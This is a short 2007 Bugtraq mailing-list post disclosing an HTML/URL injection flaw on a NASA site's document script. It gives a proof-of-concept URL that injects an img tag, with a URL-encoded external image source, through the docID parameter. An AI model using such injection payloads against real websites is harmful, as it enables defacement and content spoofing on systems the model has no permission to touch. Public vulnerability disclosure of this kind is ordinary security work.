
Date: 19 May 2007 06:46:57 -0000
From: matrix@...kerz.ir
To: bugtraq@...urityfocus.com
Subject: NASA Site Bug ( Check URI Input )

Matrix (S.B)
Hackerz.ir

http://gcmd.nasa.gov/ is Vulnerable to URL Injection and Don't Full Checking URL

Sample Test : 

http://gcmd.nasa.gov/ProjectOneStop/getDocument.py?docID=%3chtml><img%20border="0"%20src="%68%74%74%70%3A%2F%2F%69%31%36%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%36%66%6A%6F%33%6F%31%2E%6A%70%67"%20width="752"%20height="544">

By : Matrix ( S.B )
